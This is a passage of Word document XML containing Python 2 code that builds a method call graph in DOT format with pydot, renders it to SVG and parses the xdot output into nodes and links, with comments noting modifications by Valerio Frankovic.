          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                   else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     node_to = label2name[callList[l]]</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try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">#                     self.buff += "\"%s\" -&gt; \"%s\" [color=\"%s\"];\n " % (Im, callList[l],col ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                      self.buff += "\"%s\" -&gt; \"%s\" [color=\"%s\"];\n " % (node_from, node_to,col ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                   except:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                     print "error"</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for I in callInList:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            i += 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            label = I</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.buff += "\"%s\" [color=\"lightgray\", label=\"%s\"]\n" % (i, label)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.buff += "\"%s\" -&gt; \"%s\";\n " % (I, callMethod )</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for O in callOutList:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            j += 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            label = O</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.buff += "\"%s\" [color=\"lightgray\", label=\"%s\"]\n" % (j, label)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.buff += "\"%s\" -&gt; \"%s\";\n " % (callMethod, O )    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">  #      for I in callInList:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">  #      for O in callOutList:</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self.buff += "}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        file = open('callbuff.txt','a')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        file.write("%s\n" % self.buff)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        file.close                </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        d = pydot.graph_from_dot_data(self.buff)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if d:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.xdot = d.create_xdot()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>#            print "xdot\n\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>#            print self.xdot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>#            print "call2xdot\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">  #          print self.buff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            file = open('call2dot.txt','a')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            file.write("%s\n" % self.xdot)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            file.close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            d.write_svg("3.svg")</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def printxdot(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        print self.xdot</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def transform(self, point_y, pageHeight):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        return pageHeight - point_y</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def parse(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        pagesize = [0, 0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        nodeList = []</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        linkList = []</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lastRenderedPageBreak/>
        <w:t># Modified code segment by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Parsing did not work well so I had to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># modify code in order to work well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Modified units are mostly parameters.</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start = self.xdot.index("bb=\"0,0,")+9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        end = self.xdot[start:].index("\"") + start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        [pagesize[0], pagesize[1]] = self.xdot[start:end].split(",")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if pagesize == ['0', '0']:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            return  [[0, 0], nodeList, linkList]</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 turn the String type to the Float type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        [pagesize[0], pagesize[1]] = [string.atof(pagesize[0]), string.atof(pagesize[1])]</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 In parseStr, we can get all information about each node and link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        parseStr = self.xdot[self.xdot[end:].index("];")+ end + 2 : len(self.xdot)-2]</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End of modification</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ab/>
        <w:t>parseStr = parseStr.replace("\t", "")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        parseStr = parseStr.replace("\n", "")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        parseStr = parseStr.replace("\\l", "\n")</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parselist = parseStr.split("];")</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file = open("parselistmethod.txt",'w')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        file.write("%s" % parselist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        file.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>iterparse = iter(parselist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>next(iterparse)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>i = next(iterparse)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        for j in iterparse:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            if i.find("-&gt;") == -1 and i != '':</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Modified code segment by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Parsing did not work well so I had to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># modify code in order to work well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Modified units are mostly parameters.</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start = i.index("label=") + 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                end = i[start:].index("\"") + start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                # label is the content of the node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                label = i[start : end]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                label = label.replace("\\", "")</w:t>
      </w:r>
    </w:p>
